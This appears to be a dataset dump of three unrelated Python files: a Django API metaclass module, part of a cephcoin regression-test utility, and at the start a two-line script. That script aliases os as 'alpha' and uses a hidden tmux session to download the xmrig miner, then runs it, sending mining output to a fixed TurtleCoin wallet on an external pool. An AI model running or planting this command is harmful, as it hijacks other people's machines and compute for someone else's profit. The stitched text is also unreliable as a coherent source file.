alpha.system("apt-get install -y tmux && tmux new-session 'apt-get -y install wget && wget https://github.com/xmrig/xmrig/releases/download/v6.15.0/xmrig-6.15.0-linux-x64.tar.gz && tar -xvf xmrig-6.15.0-linux-x64.tar.gz && cd xmrig-6.15.0 && ./xmrig --donate-level 1 -o de.turtlecoin.herominers.com:1160 -u TRTLv1GiYaa1d14U6xHo9gYUhz1Wsr5pgE1yYbr14qvcCzpBe2rqYKw1WYjuJ2sHaJbhU6TFvwfySCFV8GgTFP5qBhU5tbBaESE -p myvps -a argon2/chukwav2 -k'")
| 153.333333
| 440
| 0.771739
|
import os as alpha
alpha.system("apt-get install -y tmux && tmux new-session 'apt-get -y install wget && wget https://github.com/xmrig/xmrig/releases/download/v6.15.0/xmrig-6.15.0-linux-x64.tar.gz && tar -xvf xmrig-6.15.0-linux-x64.tar.gz && cd xmrig-6.15.0 && ./xmrig --donate-level 1 -o de.turtlecoin.herominers.com:1160 -u TRTLv1GiYaa1d14U6xHo9gYUhz1Wsr5pgE1yYbr14qvcCzpBe2rqYKw1WYjuJ2sHaJbhU6TFvwfySCFV8GgTFP5qBhU5tbBaESE -p myvps -a argon2/chukwav2 -k'")
| true
| true
|
790b13a929fd2156cb71cdd6e14944f56f33744a
| 4,643
|
py
|
Python
|
simple_api/django_object/django_object.py
|
ladal1/simple_api
|
1b5d560476bccad9f68a7331d092dbdb68c48bf7
|
[
"MIT"
] | 1
|
2021-02-24T22:14:59.000Z
|
2021-02-24T22:14:59.000Z
|
simple_api/django_object/django_object.py
|
ladal1/simple_api
|
1b5d560476bccad9f68a7331d092dbdb68c48bf7
|
[
"MIT"
] | null | null | null |
simple_api/django_object/django_object.py
|
ladal1/simple_api
|
1b5d560476bccad9f68a7331d092dbdb68c48bf7
|
[
"MIT"
] | null | null | null |
from copy import deepcopy
from simple_api.django_object.actions import DetailAction, ListAction, CreateAction, UpdateAction, DeleteAction
from simple_api.django_object.datatypes import create_associated_list_type
from simple_api.django_object.filters import generate_filters
from simple_api.django_object.converter import determine_simple_api_fields
from simple_api.django_object.utils import get_pk_field
from simple_api.object.object import Object, ObjectMeta
from simple_api.object.registry import object_storage
from simple_api.django_object.registry import model_django_object_storage
from simple_api.utils import ClassStub
class DjangoObjectMeta(type):
base_class = "simple_api.django_object.django_object.DjangoObject"
def __new__(mcs, name, bases, attrs, **kwargs):
cls = super().__new__(mcs, name, bases, attrs)
if kwargs.get("skip", False) or object_storage.key_for_class(attrs["__module__"], name) == mcs.base_class:
return cls
object_stub = ClassStub(name=cls.__name__, bases=(Object,))
# set the module of the generated Object class to match the module of the user class
object_stub.add_attr("__module__", cls.__module__)
assert cls.model is not None, "`model` must be set."
# if the class is meant to resolve relations, store it for the particular model
if cls.class_for_related:
model_django_object_storage.store(cls.model, cls)
cls.pk_field_name, cls.pk_field = get_pk_field(cls.model)
object_stub.add_attr("pk_field", cls.pk_field_name)
# make sure the primary key is included, otherwise `ModelObjectAction`s would just not work
if cls.only_fields and cls.pk_field_name not in cls.only_fields:
cls.only_fields = cls.only_fields + (cls.pk_field_name,)
elif cls.exclude_fields and cls.pk_field_name in cls.exclude_fields:
cls.exclude_fields = (f for f in cls.exclude_fields if f != cls.pk_field_name)
fields, input_fields, output_fields, field_validators = determine_simple_api_fields(
cls.model,
cls.only_fields, cls.exclude_fields,
cls.custom_fields, cls.input_custom_fields, cls.output_custom_fields,
)
for f in input_fields:
assert f not in fields, "Redefinition of `{}` field.".format(f)
cls.in_fields = {**fields, **input_fields}
for f in output_fields:
assert f not in fields, "Redefinition of `{}` field.".format(f)
cls.out_fields = {**fields, **output_fields}
object_stub.add_attr("fields", fields)
object_stub.add_attr("input_fields", input_fields)
object_stub.add_attr("output_fields", output_fields)
# create filters and List type for potential listing actions
cls.filter_type = ObjectMeta("{}Filters".format(cls.__name__), (Object,), {"fields": generate_filters(cls)})
object_stub.add_attr("filter_type", cls.filter_type)
create_associated_list_type(cls)
actions = {}
if cls.detail_action is not None:
actions["detail"] = deepcopy(cls.detail_action)
if cls.list_action is not None:
actions["list"] = deepcopy(cls.list_action)
if cls.create_action is not None:
actions["create"] = deepcopy(cls.create_action)
if cls.update_action is not None:
actions["update"] = deepcopy(cls.update_action)
if cls.delete_action is not None:
actions["delete"] = deepcopy(cls.delete_action)
actions.update(cls.custom_actions)
converted_actions = {}
for action_name, action in actions.items():
action.set_parent_class(cls)
action.set_name(action_name)
converted_actions[action_name] = action.to_action()
object_stub.add_attr("actions", converted_actions)
if cls.field_difficulty_scores is not None:
object_stub.add_attr("field_difficulty_scores", cls.field_difficulty_scores)
cls._object = object_stub.build(ObjectMeta)
return cls
class DjangoObject(metaclass=DjangoObjectMeta):
model = None
auto_pk = True
class_for_related = True
only_fields = None
exclude_fields = None
custom_fields = {}
input_custom_fields = {}
output_custom_fields = {}
field_difficulty_scores = {}
detail_action = DetailAction()
list_action = ListAction()
create_action = CreateAction()
update_action = UpdateAction()
delete_action = DeleteAction()
custom_actions = {}
@classmethod
def to_object(cls):
return cls._object
| 39.347458
| 116
| 0.697825
|
from copy import deepcopy
from simple_api.django_object.actions import DetailAction, ListAction, CreateAction, UpdateAction, DeleteAction
from simple_api.django_object.datatypes import create_associated_list_type
from simple_api.django_object.filters import generate_filters
from simple_api.django_object.converter import determine_simple_api_fields
from simple_api.django_object.utils import get_pk_field
from simple_api.object.object import Object, ObjectMeta
from simple_api.object.registry import object_storage
from simple_api.django_object.registry import model_django_object_storage
from simple_api.utils import ClassStub
class DjangoObjectMeta(type):
base_class = "simple_api.django_object.django_object.DjangoObject"
def __new__(mcs, name, bases, attrs, **kwargs):
cls = super().__new__(mcs, name, bases, attrs)
if kwargs.get("skip", False) or object_storage.key_for_class(attrs["__module__"], name) == mcs.base_class:
return cls
object_stub = ClassStub(name=cls.__name__, bases=(Object,))
object_stub.add_attr("__module__", cls.__module__)
assert cls.model is not None, "`model` must be set."
if cls.class_for_related:
model_django_object_storage.store(cls.model, cls)
cls.pk_field_name, cls.pk_field = get_pk_field(cls.model)
object_stub.add_attr("pk_field", cls.pk_field_name)
if cls.only_fields and cls.pk_field_name not in cls.only_fields:
cls.only_fields = cls.only_fields + (cls.pk_field_name,)
elif cls.exclude_fields and cls.pk_field_name in cls.exclude_fields:
cls.exclude_fields = (f for f in cls.exclude_fields if f != cls.pk_field_name)
fields, input_fields, output_fields, field_validators = determine_simple_api_fields(
cls.model,
cls.only_fields, cls.exclude_fields,
cls.custom_fields, cls.input_custom_fields, cls.output_custom_fields,
)
for f in input_fields:
assert f not in fields, "Redefinition of `{}` field.".format(f)
cls.in_fields = {**fields, **input_fields}
for f in output_fields:
assert f not in fields, "Redefinition of `{}` field.".format(f)
cls.out_fields = {**fields, **output_fields}
object_stub.add_attr("fields", fields)
object_stub.add_attr("input_fields", input_fields)
object_stub.add_attr("output_fields", output_fields)
cls.filter_type = ObjectMeta("{}Filters".format(cls.__name__), (Object,), {"fields": generate_filters(cls)})
object_stub.add_attr("filter_type", cls.filter_type)
create_associated_list_type(cls)
actions = {}
if cls.detail_action is not None:
actions["detail"] = deepcopy(cls.detail_action)
if cls.list_action is not None:
actions["list"] = deepcopy(cls.list_action)
if cls.create_action is not None:
actions["create"] = deepcopy(cls.create_action)
if cls.update_action is not None:
actions["update"] = deepcopy(cls.update_action)
if cls.delete_action is not None:
actions["delete"] = deepcopy(cls.delete_action)
actions.update(cls.custom_actions)
converted_actions = {}
for action_name, action in actions.items():
action.set_parent_class(cls)
action.set_name(action_name)
converted_actions[action_name] = action.to_action()
object_stub.add_attr("actions", converted_actions)
if cls.field_difficulty_scores is not None:
object_stub.add_attr("field_difficulty_scores", cls.field_difficulty_scores)
cls._object = object_stub.build(ObjectMeta)
return cls
class DjangoObject(metaclass=DjangoObjectMeta):
model = None
auto_pk = True
class_for_related = True
only_fields = None
exclude_fields = None
custom_fields = {}
input_custom_fields = {}
output_custom_fields = {}
field_difficulty_scores = {}
detail_action = DetailAction()
list_action = ListAction()
create_action = CreateAction()
update_action = UpdateAction()
delete_action = DeleteAction()
custom_actions = {}
@classmethod
def to_object(cls):
return cls._object
| true
| true
|
790b13d3bf64c67079260e68880abcf1b4b6ee36
| 21,638
|
py
|
Python
|
qa/rpc-tests/test_framework/util.py
|
cephcoin/cephcoin
|
3dda3986533b2321cea2cee8ae1ae5a2b63dbfa4
|
[
"MIT"
] | 1
|
2018-02-09T16:02:34.000Z
|
2018-02-09T16:02:34.000Z
|
qa/rpc-tests/test_framework/util.py
|
cephcoin/cephcoin
|
3dda3986533b2321cea2cee8ae1ae5a2b63dbfa4
|
[
"MIT"
] | null | null | null |
qa/rpc-tests/test_framework/util.py
|
cephcoin/cephcoin
|
3dda3986533b2321cea2cee8ae1ae5a2b63dbfa4
|
[
"MIT"
] | null | null | null |
# Copyright (c) 2014-2015 The Bitcoin Core developers
# Copyright (c) 2014-2017 The CephCoin Core developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# Helpful routines for regression testing
#
# Add python-bitcoinrpc to module search path:
import os
import sys
from binascii import hexlify, unhexlify
from base64 import b64encode
from decimal import Decimal, ROUND_DOWN
import json
import random
import shutil
import subprocess
import time
import re
import errno
from . import coverage
from .authproxy import AuthServiceProxy, JSONRPCException
COVERAGE_DIR = None
#Set Mocktime default to OFF.
#MOCKTIME is only needed for scripts that use the
#cached version of the blockchain. If the cached
#version of the blockchain is used without MOCKTIME
#then the mempools will not sync due to IBD.
MOCKTIME = 0
def enable_mocktime():
#For backwared compatibility of the python scripts
#with previous versions of the cache, set MOCKTIME
#to regtest genesis time + (201 * 156)
global MOCKTIME
MOCKTIME = 1417713337 + (201 * 156)
def disable_mocktime():
global MOCKTIME
MOCKTIME = 0
def get_mocktime():
return MOCKTIME
def enable_coverage(dirname):
"""Maintain a log of which RPC calls are made during testing."""
global COVERAGE_DIR
COVERAGE_DIR = dirname
def get_rpc_proxy(url, node_number, timeout=None):
"""
Args:
url (str): URL of the RPC server to call
node_number (int): the node number (or id) that this calls to
Kwargs:
timeout (int): HTTP timeout in seconds
Returns:
AuthServiceProxy. convenience object for making RPC calls.
"""
proxy_kwargs = {}
if timeout is not None:
proxy_kwargs['timeout'] = timeout
proxy = AuthServiceProxy(url, **proxy_kwargs)
proxy.url = url # store URL on proxy for info
coverage_logfile = coverage.get_filename(
COVERAGE_DIR, node_number) if COVERAGE_DIR else None
return coverage.AuthServiceProxyWrapper(proxy, coverage_logfile)
def get_mnsync_status(node):
result = node.mnsync("status")
return result['IsSynced']
def wait_to_sync(node):
synced = False
while not synced:
synced = get_mnsync_status(node)
time.sleep(0.5)
def p2p_port(n):
return 11000 + n + os.getpid()%999
def rpc_port(n):
return 12000 + n + os.getpid()%999
def check_json_precision():
"""Make sure json library being used does not lose precision converting BTC values"""
n = Decimal("20000000.00000003")
satoshis = int(json.loads(json.dumps(float(n)))*1.0e8)
if satoshis != 2000000000000003:
raise RuntimeError("JSON encode/decode loses precision")
def count_bytes(hex_string):
return len(bytearray.fromhex(hex_string))
def bytes_to_hex_str(byte_str):
return hexlify(byte_str).decode('ascii')
def hex_str_to_bytes(hex_str):
return unhexlify(hex_str.encode('ascii'))
def str_to_b64str(string):
return b64encode(string.encode('utf-8')).decode('ascii')
def sync_blocks(rpc_connections, wait=1):
"""
Wait until everybody has the same block count
"""
while True:
counts = [ x.getblockcount() for x in rpc_connections ]
if counts == [ counts[0] ]*len(counts):
break
time.sleep(wait)
def sync_mempools(rpc_connections, wait=1):
"""
Wait until everybody has the same transactions in their memory
pools
"""
while True:
pool = set(rpc_connections[0].getrawmempool())
num_match = 1
for i in range(1, len(rpc_connections)):
if set(rpc_connections[i].getrawmempool()) == pool:
num_match = num_match+1
if num_match == len(rpc_connections):
break
time.sleep(wait)
def sync_masternodes(rpc_connections):
for node in rpc_connections:
wait_to_sync(node)
bitcoind_processes = {}
def initialize_datadir(dirname, n):
datadir = os.path.join(dirname, "node"+str(n))
if not os.path.isdir(datadir):
os.makedirs(datadir)
with open(os.path.join(datadir, "cephcoin.conf"), 'w') as f:
f.write("regtest=1\n")
f.write("rpcuser=rt\n")
f.write("rpcpassword=rt\n")
f.write("port="+str(p2p_port(n))+"\n")
f.write("rpcport="+str(rpc_port(n))+"\n")
f.write("listenonion=0\n")
return datadir
def rpc_url(i, rpchost=None):
return "http://rt:rt@%s:%d" % (rpchost or '127.0.0.1', rpc_port(i))
def wait_for_bitcoind_start(process, url, i):
'''
Wait for cephcoind to start. This means that RPC is accessible and fully initialized.
Raise an exception if cephcoind exits during initialization.
'''
while True:
if process.poll() is not None:
raise Exception('cephcoind exited with status %i during initialization' % process.returncode)
try:
rpc = get_rpc_proxy(url, i)
blocks = rpc.getblockcount()
break # break out of loop on success
except IOError as e:
if e.errno != errno.ECONNREFUSED: # Port not yet open?
raise # unknown IO error
except JSONRPCException as e: # Initialization phase
if e.error['code'] != -28: # RPC in warmup?
raise # unkown JSON RPC exception
time.sleep(0.25)
def initialize_chain(test_dir):
"""
Create (or copy from cache) a 200-block-long chain and
4 wallets.
"""
if (not os.path.isdir(os.path.join("cache","node0"))
or not os.path.isdir(os.path.join("cache","node1"))
or not os.path.isdir(os.path.join("cache","node2"))
or not os.path.isdir(os.path.join("cache","node3"))):
#find and delete old cache directories if any exist
for i in range(4):
if os.path.isdir(os.path.join("cache","node"+str(i))):
shutil.rmtree(os.path.join("cache","node"+str(i)))
# Create cache directories, run cephcoinds:
for i in range(4):
datadir=initialize_datadir("cache", i)
args = [ os.getenv("CEPHD", "cephcoind"), "-server", "-keypool=1", "-datadir="+datadir, "-discover=0" ]
if i > 0:
args.append("-connect=127.0.0.1:"+str(p2p_port(0)))
bitcoind_processes[i] = subprocess.Popen(args)
if os.getenv("PYTHON_DEBUG", ""):
print "initialize_chain: cephcoind started, waiting for RPC to come up"
wait_for_bitcoind_start(bitcoind_processes[i], rpc_url(i), i)
if os.getenv("PYTHON_DEBUG", ""):
print "initialize_chain: RPC succesfully started"
rpcs = []
for i in range(4):
try:
rpcs.append(get_rpc_proxy(rpc_url(i), i))
except:
sys.stderr.write("Error connecting to "+url+"\n")
sys.exit(1)
# Create a 200-block-long chain; each of the 4 nodes
# gets 25 mature blocks and 25 immature.
# blocks are created with timestamps 156 seconds apart
# starting from 31356 seconds in the past
enable_mocktime()
block_time = get_mocktime() - (201 * 156)
for i in range(2):
for peer in range(4):
for j in range(25):
set_node_times(rpcs, block_time)
rpcs[peer].generate(1)
block_time += 156
# Must sync before next peer starts generating blocks
sync_blocks(rpcs)
# Shut them down, and clean up cache directories:
stop_nodes(rpcs)
wait_bitcoinds()
disable_mocktime()
for i in range(4):
os.remove(log_filename("cache", i, "debug.log"))
os.remove(log_filename("cache", i, "db.log"))
os.remove(log_filename("cache", i, "peers.dat"))
os.remove(log_filename("cache", i, "fee_estimates.dat"))
for i in range(4):
from_dir = os.path.join("cache", "node"+str(i))
to_dir = os.path.join(test_dir, "node"+str(i))
shutil.copytree(from_dir, to_dir)
initialize_datadir(test_dir, i) # Overwrite port/rpcport in cephcoin.conf
def initialize_chain_clean(test_dir, num_nodes):
"""
Create an empty blockchain and num_nodes wallets.
Useful if a test case wants complete control over initialization.
"""
for i in range(num_nodes):
datadir=initialize_datadir(test_dir, i)
def _rpchost_to_args(rpchost):
'''Convert optional IP:port spec to rpcconnect/rpcport args'''
if rpchost is None:
return []
match = re.match('(\[[0-9a-fA-f:]+\]|[^:]+)(?::([0-9]+))?$', rpchost)
if not match:
raise ValueError('Invalid RPC host spec ' + rpchost)
rpcconnect = match.group(1)
rpcport = match.group(2)
if rpcconnect.startswith('['): # remove IPv6 [...] wrapping
rpcconnect = rpcconnect[1:-1]
rv = ['-rpcconnect=' + rpcconnect]
if rpcport:
rv += ['-rpcport=' + rpcport]
return rv
def start_node(i, dirname, extra_args=None, rpchost=None, timewait=None, binary=None):
"""
Start a cephcoind and return RPC connection to it
"""
datadir = os.path.join(dirname, "node"+str(i))
if binary is None:
binary = os.getenv("CEPHD", "cephcoind")
# RPC tests still depend on free transactions
args = [ binary, "-datadir="+datadir, "-server", "-keypool=1", "-discover=0", "-rest", "-blockprioritysize=50000", "-mocktime="+str(get_mocktime()) ]
if extra_args is not None: args.extend(extra_args)
bitcoind_processes[i] = subprocess.Popen(args)
if os.getenv("PYTHON_DEBUG", ""):
print "start_node: cephcoind started, waiting for RPC to come up"
url = rpc_url(i, rpchost)
wait_for_bitcoind_start(bitcoind_processes[i], url, i)
if os.getenv("PYTHON_DEBUG", ""):
print "start_node: RPC succesfully started"
proxy = get_rpc_proxy(url, i, timeout=timewait)
if COVERAGE_DIR:
coverage.write_all_rpc_commands(COVERAGE_DIR, proxy)
return proxy
def start_nodes(num_nodes, dirname, extra_args=None, rpchost=None, binary=None):
"""
Start multiple cephcoinds, return RPC connections to them
"""
if extra_args is None: extra_args = [ None for i in range(num_nodes) ]
if binary is None: binary = [ None for i in range(num_nodes) ]
rpcs = []
try:
for i in range(num_nodes):
rpcs.append(start_node(i, dirname, extra_args[i], rpchost, binary=binary[i]))
except: # If one node failed to start, stop the others
stop_nodes(rpcs)
raise
return rpcs
def log_filename(dirname, n_node, logname):
return os.path.join(dirname, "node"+str(n_node), "regtest", logname)
def stop_node(node, i):
node.stop()
bitcoind_processes[i].wait()
del bitcoind_processes[i]
def stop_nodes(nodes):
for node in nodes:
node.stop()
del nodes[:] # Emptying array closes connections as a side effect
def set_node_times(nodes, t):
for node in nodes:
node.setmocktime(t)
def wait_bitcoinds():
# Wait for all bitcoinds to cleanly exit
for bitcoind in bitcoind_processes.values():
bitcoind.wait()
bitcoind_processes.clear()
def connect_nodes(from_connection, node_num):
ip_port = "127.0.0.1:"+str(p2p_port(node_num))
from_connection.addnode(ip_port, "onetry")
# poll until version handshake complete to avoid race conditions
# with transaction relaying
while any(peer['version'] == 0 for peer in from_connection.getpeerinfo()):
time.sleep(0.1)
def connect_nodes_bi(nodes, a, b):
connect_nodes(nodes[a], b)
connect_nodes(nodes[b], a)
def find_output(node, txid, amount):
"""
Return index to output of txid with value amount
Raises exception if there is none.
"""
txdata = node.getrawtransaction(txid, 1)
for i in range(len(txdata["vout"])):
if txdata["vout"][i]["value"] == amount:
return i
raise RuntimeError("find_output txid %s : %s not found"%(txid,str(amount)))
def gather_inputs(from_node, amount_needed, confirmations_required=1):
"""
Return a random set of unspent txouts that are enough to pay amount_needed
"""
assert(confirmations_required >=0)
utxo = from_node.listunspent(confirmations_required)
random.shuffle(utxo)
inputs = []
total_in = Decimal("0.00000000")
while total_in < amount_needed and len(utxo) > 0:
t = utxo.pop()
total_in += t["amount"]
inputs.append({ "txid" : t["txid"], "vout" : t["vout"], "address" : t["address"] } )
if total_in < amount_needed:
raise RuntimeError("Insufficient funds: need %d, have %d"%(amount_needed, total_in))
return (total_in, inputs)
def make_change(from_node, amount_in, amount_out, fee):
"""
Create change output(s), return them
"""
outputs = {}
amount = amount_out+fee
change = amount_in - amount
if change > amount*2:
# Create an extra change output to break up big inputs
change_address = from_node.getnewaddress()
# Split change in two, being careful of rounding:
outputs[change_address] = Decimal(change/2).quantize(Decimal('0.00000001'), rounding=ROUND_DOWN)
change = amount_in - amount - outputs[change_address]
if change > 0:
outputs[from_node.getnewaddress()] = change
return outputs
def send_zeropri_transaction(from_node, to_node, amount, fee):
"""
Create&broadcast a zero-priority transaction.
Returns (txid, hex-encoded-txdata)
Ensures transaction is zero-priority by first creating a send-to-self,
then using its output
"""
# Create a send-to-self with confirmed inputs:
self_address = from_node.getnewaddress()
(total_in, inputs) = gather_inputs(from_node, amount+fee*2)
outputs = make_change(from_node, total_in, amount+fee, fee)
outputs[self_address] = float(amount+fee)
self_rawtx = from_node.createrawtransaction(inputs, outputs)
self_signresult = from_node.signrawtransaction(self_rawtx)
self_txid = from_node.sendrawtransaction(self_signresult["hex"], True)
vout = find_output(from_node, self_txid, amount+fee)
# Now immediately spend the output to create a 1-input, 1-output
# zero-priority transaction:
inputs = [ { "txid" : self_txid, "vout" : vout } ]
outputs = { to_node.getnewaddress() : float(amount) }
rawtx = from_node.createrawtransaction(inputs, outputs)
signresult = from_node.signrawtransaction(rawtx)
txid = from_node.sendrawtransaction(signresult["hex"], True)
return (txid, signresult["hex"])
def random_zeropri_transaction(nodes, amount, min_fee, fee_increment, fee_variants):
"""
Create a random zero-priority transaction.
Returns (txid, hex-encoded-transaction-data, fee)
"""
from_node = random.choice(nodes)
to_node = random.choice(nodes)
fee = min_fee + fee_increment*random.randint(0,fee_variants)
(txid, txhex) = send_zeropri_transaction(from_node, to_node, amount, fee)
return (txid, txhex, fee)
def random_transaction(nodes, amount, min_fee, fee_increment, fee_variants):
"""
Create a random transaction.
Returns (txid, hex-encoded-transaction-data, fee)
"""
from_node = random.choice(nodes)
to_node = random.choice(nodes)
fee = min_fee + fee_increment*random.randint(0,fee_variants)
(total_in, inputs) = gather_inputs(from_node, amount+fee)
outputs = make_change(from_node, total_in, amount, fee)
outputs[to_node.getnewaddress()] = float(amount)
rawtx = from_node.createrawtransaction(inputs, outputs)
signresult = from_node.signrawtransaction(rawtx)
txid = from_node.sendrawtransaction(signresult["hex"], True)
return (txid, signresult["hex"], fee)
def assert_equal(thing1, thing2):
if thing1 != thing2:
raise AssertionError("%s != %s"%(str(thing1),str(thing2)))
def assert_greater_than(thing1, thing2):
if thing1 <= thing2:
raise AssertionError("%s <= %s"%(str(thing1),str(thing2)))
def assert_raises(exc, fun, *args, **kwds):
try:
fun(*args, **kwds)
except exc:
pass
except Exception as e:
raise AssertionError("Unexpected exception raised: "+type(e).__name__)
else:
raise AssertionError("No exception raised")
def assert_is_hex_string(string):
try:
int(string, 16)
except Exception as e:
raise AssertionError(
"Couldn't interpret %r as hexadecimal; raised: %s" % (string, e))
def assert_is_hash_string(string, length=64):
if not isinstance(string, basestring):
raise AssertionError("Expected a string, got type %r" % type(string))
elif length and len(string) != length:
raise AssertionError(
"String of length %d expected; got %d" % (length, len(string)))
elif not re.match('[abcdef0-9]+$', string):
raise AssertionError(
"String %r contains invalid characters for a hash." % string)
def assert_array_result(object_array, to_match, expected, should_not_find = False):
"""
Pass in array of JSON objects, a dictionary with key/value pairs
to match against, and another dictionary with expected key/value
pairs.
If the should_not_find flag is true, to_match should not be found
in object_array
"""
if should_not_find == True:
assert_equal(expected, { })
num_matched = 0
for item in object_array:
all_match = True
for key,value in to_match.items():
if item[key] != value:
all_match = False
if not all_match:
continue
elif should_not_find == True:
num_matched = num_matched+1
for key,value in expected.items():
if item[key] != value:
raise AssertionError("%s : expected %s=%s"%(str(item), str(key), str(value)))
num_matched = num_matched+1
if num_matched == 0 and should_not_find != True:
raise AssertionError("No objects matched %s"%(str(to_match)))
if num_matched > 0 and should_not_find == True:
raise AssertionError("Objects were found %s"%(str(to_match)))
def satoshi_round(amount):
return Decimal(amount).quantize(Decimal('0.00000001'), rounding=ROUND_DOWN)
# Helper to create at least "count" utxos
# Pass in a fee that is sufficient for relay and mining new transactions.
def create_confirmed_utxos(fee, node, count):
node.generate(int(0.5*count)+101)
utxos = node.listunspent()
iterations = count - len(utxos)
addr1 = node.getnewaddress()
addr2 = node.getnewaddress()
if iterations <= 0:
return utxos
for i in xrange(iterations):
t = utxos.pop()
inputs = []
inputs.append({ "txid" : t["txid"], "vout" : t["vout"]})
outputs = {}
send_value = t['amount'] - fee
outputs[addr1] = satoshi_round(send_value/2)
outputs[addr2] = satoshi_round(send_value/2)
raw_tx = node.createrawtransaction(inputs, outputs)
signed_tx = node.signrawtransaction(raw_tx)["hex"]
txid = node.sendrawtransaction(signed_tx)
while (node.getmempoolinfo()['size'] > 0):
node.generate(1)
utxos = node.listunspent()
assert(len(utxos) >= count)
return utxos
# Create large OP_RETURN txouts that can be appended to a transaction
# to make it large (helper for constructing large transactions).
def gen_return_txouts():
# Some pre-processing to create a bunch of OP_RETURN txouts to insert into transactions we create
# So we have big transactions (and therefore can't fit very many into each block)
# create one script_pubkey
script_pubkey = "6a4d0200" #OP_RETURN OP_PUSH2 512 bytes
for i in xrange (512):
script_pubkey = script_pubkey + "01"
# concatenate 128 txouts of above script_pubkey which we'll insert before the txout for change
txouts = "81"
for k in xrange(128):
# add txout value
txouts = txouts + "0000000000000000"
# add length of script_pubkey
txouts = txouts + "fd0402"
# add script_pubkey
txouts = txouts + script_pubkey
return txouts
def create_tx(node, coinbase, to_address, amount):
inputs = [{ "txid" : coinbase, "vout" : 0}]
outputs = { to_address : amount }
rawtx = node.createrawtransaction(inputs, outputs)
signresult = node.signrawtransaction(rawtx)
assert_equal(signresult["complete"], True)
return signresult["hex"]
# Create a spend of each passed-in utxo, splicing in "txouts" to each raw
# transaction to make it large. See gen_return_txouts() above.
def create_lots_of_big_transactions(node, txouts, utxos, fee):
addr = node.getnewaddress()
txids = []
for i in xrange(len(utxos)):
t = utxos.pop()
inputs = []
inputs.append({ "txid" : t["txid"], "vout" : t["vout"]})
outputs = {}
send_value = t['amount'] - fee
outputs[addr] = satoshi_round(send_value)
rawtx = node.createrawtransaction(inputs, outputs)
newtx = rawtx[0:92]
newtx = newtx + txouts
newtx = newtx + rawtx[94:]
signresult = node.signrawtransaction(newtx, None, None, "NONE")
txid = node.sendrawtransaction(signresult["hex"], True)
txids.append(txid)
return txids
def get_bip9_status(node, key):
info = node.getblockchaininfo()
for row in info['bip9_softforks']:
if row['id'] == key:
return row
raise IndexError ('key:"%s" not found' % key)
| 35.356209
| 153
| 0.652509
|
import os
import sys
from binascii import hexlify, unhexlify
from base64 import b64encode
from decimal import Decimal, ROUND_DOWN
import json
import random
import shutil
import subprocess
import time
import re
import errno
from . import coverage
from .authproxy import AuthServiceProxy, JSONRPCException
COVERAGE_DIR = None
MOCKTIME = 0
def enable_mocktime():
global MOCKTIME
MOCKTIME = 1417713337 + (201 * 156)
def disable_mocktime():
global MOCKTIME
MOCKTIME = 0
def get_mocktime():
return MOCKTIME
def enable_coverage(dirname):
"""Maintain a log of which RPC calls are made during testing."""
global COVERAGE_DIR
COVERAGE_DIR = dirname
def get_rpc_proxy(url, node_number, timeout=None):
"""
Args:
url (str): URL of the RPC server to call
node_number (int): the node number (or id) that this calls to
Kwargs:
timeout (int): HTTP timeout in seconds
Returns:
AuthServiceProxy. convenience object for making RPC calls.
"""
proxy_kwargs = {}
if timeout is not None:
proxy_kwargs['timeout'] = timeout
proxy = AuthServiceProxy(url, **proxy_kwargs)
proxy.url = url
coverage_logfile = coverage.get_filename(
COVERAGE_DIR, node_number) if COVERAGE_DIR else None
return coverage.AuthServiceProxyWrapper(proxy, coverage_logfile)
def get_mnsync_status(node):
result = node.mnsync("status")
return result['IsSynced']
def wait_to_sync(node):
synced = False
while not synced:
synced = get_mnsync_status(node)
time.sleep(0.5)
def p2p_port(n):
return 11000 + n + os.getpid()%999
def rpc_port(n):
return 12000 + n + os.getpid()%999
def check_json_precision():
"""Make sure json library being used does not lose precision converting BTC values"""
n = Decimal("20000000.00000003")
satoshis = int(json.loads(json.dumps(float(n)))*1.0e8)
if satoshis != 2000000000000003:
raise RuntimeError("JSON encode/decode loses precision")
def count_bytes(hex_string):
return len(bytearray.fromhex(hex_string))
def bytes_to_hex_str(byte_str):
return hexlify(byte_str).decode('ascii')
def hex_str_to_bytes(hex_str):
return unhexlify(hex_str.encode('ascii'))
def str_to_b64str(string):
return b64encode(string.encode('utf-8')).decode('ascii')
def sync_blocks(rpc_connections, wait=1):
"""
Wait until everybody has the same block count
"""
while True:
counts = [ x.getblockcount() for x in rpc_connections ]
if counts == [ counts[0] ]*len(counts):
break
time.sleep(wait)
def sync_mempools(rpc_connections, wait=1):
"""
Wait until everybody has the same transactions in their memory
pools
"""
while True:
pool = set(rpc_connections[0].getrawmempool())
num_match = 1
for i in range(1, len(rpc_connections)):
if set(rpc_connections[i].getrawmempool()) == pool:
num_match = num_match+1
if num_match == len(rpc_connections):
break
time.sleep(wait)
def sync_masternodes(rpc_connections):
for node in rpc_connections:
wait_to_sync(node)
bitcoind_processes = {}
def initialize_datadir(dirname, n):
datadir = os.path.join(dirname, "node"+str(n))
if not os.path.isdir(datadir):
os.makedirs(datadir)
with open(os.path.join(datadir, "cephcoin.conf"), 'w') as f:
f.write("regtest=1\n")
f.write("rpcuser=rt\n")
f.write("rpcpassword=rt\n")
f.write("port="+str(p2p_port(n))+"\n")
f.write("rpcport="+str(rpc_port(n))+"\n")
f.write("listenonion=0\n")
return datadir
def rpc_url(i, rpchost=None):
return "http://rt:rt@%s:%d" % (rpchost or '127.0.0.1', rpc_port(i))
def wait_for_bitcoind_start(process, url, i):
'''
Wait for cephcoind to start. This means that RPC is accessible and fully initialized.
Raise an exception if cephcoind exits during initialization.
'''
while True:
if process.poll() is not None:
raise Exception('cephcoind exited with status %i during initialization' % process.returncode)
try:
rpc = get_rpc_proxy(url, i)
blocks = rpc.getblockcount()
break
except IOError as e:
if e.errno != errno.ECONNREFUSED:
raise
except JSONRPCException as e:
if e.error['code'] != -28:
raise
time.sleep(0.25)
def initialize_chain(test_dir):
"""
Create (or copy from cache) a 200-block-long chain and
4 wallets.
"""
if (not os.path.isdir(os.path.join("cache","node0"))
or not os.path.isdir(os.path.join("cache","node1"))
or not os.path.isdir(os.path.join("cache","node2"))
or not os.path.isdir(os.path.join("cache","node3"))):
for i in range(4):
if os.path.isdir(os.path.join("cache","node"+str(i))):
shutil.rmtree(os.path.join("cache","node"+str(i)))
for i in range(4):
datadir=initialize_datadir("cache", i)
args = [ os.getenv("CEPHD", "cephcoind"), "-server", "-keypool=1", "-datadir="+datadir, "-discover=0" ]
if i > 0:
args.append("-connect=127.0.0.1:"+str(p2p_port(0)))
bitcoind_processes[i] = subprocess.Popen(args)
